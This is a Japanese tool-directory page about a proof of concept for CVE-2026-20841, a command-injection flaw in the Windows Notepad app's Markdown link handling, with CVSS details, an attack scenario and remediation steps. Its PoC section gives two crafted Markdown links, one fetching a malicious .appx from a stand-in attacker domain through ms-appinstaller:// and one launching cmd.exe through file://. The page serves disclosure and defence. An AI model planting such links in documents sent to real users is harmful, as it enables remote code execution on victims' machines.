Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/dogukankurnaz/cve-2026-20841-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubdogukankurnaz/cve-2026-20841-poc

CVE-2026-20841-PoC

Windows のメモ帳における、細工された Markdown リンクを介したコマンドインジェクションを実証する Proof-of-Concept。リモートコード実行を可能にします。攻撃ベクトル、CVSS メトリクス、および修復ガイダンスを含みます。

リポジトリを見る
26ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20841 - Windows メモ帳アプリのリモートコード実行の脆弱性

脆弱性の概要

フィールド詳細
CVE IDCVE-2026-20841
タイトルWindows メモ帳アプリのリモートコード実行の脆弱性
影響リモートコード実行
最大深刻度Important
CVSS v3.1 Base / Temporal8.8 / 7.7
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
CWECWE-77: コマンドで使用される特殊要素の不適切な無効化('コマンドインジェクション')
影響を受ける製品Windows メモ帳アプリ(Microsoft Store 版、11.2510 より前のビルド)
割り当て CNAMicrosoft
公開日2026年2月10日
一般公開なし
悪用なし
悪用可能性の評価悪用の可能性は低い

エグゼクティブサマリー

Windows メモ帳アプリにおけるコマンドで使用される特殊要素の不適切な無効化('コマンドインジェクション')により、権限のない攻撃者がネットワーク経由でコードを実行できる可能性があります。

最新の Windows メモ帳アプリ(Microsoft Store 経由で配布)には、クリック可能なハイパーリンクを含む Markdown レンダリング機能が導入されました。この脆弱性は、メモ帳が Markdown リンク内の URI スキームを処理する前に適切に検証およびサニタイズしないために存在します。攻撃者は、特別に細工されたリンクを含む悪意のある .md ファイルを作成し、ユーザーがクリックすると、検証されていないプロトコルハンドラーがリモートコンテンツを読み込んで実行するように誘導できます。

CVSS v3.1 メトリクス

基本メトリクス

メトリクス値
攻撃元区分ネットワーク
攻撃条件の複雑さ低
必要な特権レベルなし
ユーザー操作必要
スコープ変更なし
機密性への影響高
完全性への影響高
可用性への影響高

現状メトリクス

メトリクス値
悪用コードの成熟度未実証
修正レベル公式修正
報告の信頼性確認済み

FAQ

攻撃者はこの脆弱性をどのように悪用する可能性がありますか?

攻撃者は、メモ帳で開かれた Markdown ファイル内の悪意のあるリンクをユーザーにクリックさせ、検証されていないプロトコルを起動してリモートファイルを読み込み・実行させる可能性があります。

リモートコード実行の対象コンテキストは何ですか?

CVSS メトリクスによると、攻撃元区分はネットワーク(AV:N)で、ユーザー操作が必要(UI:R)です。悪意のあるコードは、Markdown ファイルを開いたユーザーのセキュリティコンテキストで実行され、攻撃者はそのユーザーと同じ権限を取得します。

攻撃シナリオ

  1. 攻撃者は、悪意のあるハイパーリンクを含む Markdown(.md)ファイルを作成します。
  2. 被害者は、脆弱性のあるバージョンの Windows メモ帳でそのファイルを開きます。
  3. メモ帳が Markdown をレンダリングし、クリック可能なリンクを表示します。
  4. 被害者がリンクをクリックすると、メモ帳は適切な検証なしに URI を処理します。
  5. これにより、リモートペイロードを取得・実行できるプロトコルハンドラー(例:ms-appinstaller://)や、ローカルの実行可能ファイルを直接起動できる file:// URI がトリガーされます。
  6. 悪意のあるコードは、ログイン中のユーザーと同じ権限で実行されます。

概念実証

免責事項: この概念実証は、教育および許可されたセキュリティ研究の目的のみで提供されています。所有していないシステムや、明示的な書面によるテスト許可がないシステムに対しては使用しないでください。コンピュータシステムへの不正アクセスは違法であり、法律で罰せられます。

この PoC は、細工された Markdown リンクによる 2 つの攻撃ベクトルを示しています:

ベクトル 1 - プロトコルハンドラーの悪用によるリモートペイロードのインストール:

root@kitploit:~
[Click to view document](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)

ベクトル 2 - ファイル URI によるローカル実行可能ファイルの起動:

root@kitploit:~
[Click here](file://C:/windows/system32/cmd.exe)

デモ

PoC Demonstration

修復策

  • Windows メモ帳を Microsoft Store 経由でビルド 11.2510 以降に更新してください。
  • Windows の設定 > アプリ > Microsoft Store でアプリの自動更新を有効にしてください。
  • 信頼できないソースからの .md ファイルをメモ帳で開かないでください。
  • 電子メールや信頼できないダウンロードで受信した Markdown ファイル内のリンクをクリックしないでください。

参考情報

  • MSRC - CVE-2026-20841
  • NVD - CVE-2026-20841
  • CVE.org - CVE-2026-20841

法的免責事項

このリポジトリで提供される情報は、教育および許可されたセキュリティ研究の目的のみで提供されています。この概念実証は、防御者が脆弱性を理解し緩和するのに役立つように共有されています。著者は、ここで提供される情報やツールの誤用について一切責任を負いません。システムの脆弱性をテストする前に、必ず適切な書面による許可を取得してください。コンピュータシステムへの不正アクセスは、ほとんどの法域で犯罪行為です。責任を持って倫理的に使用してください。

ツールをダウンロード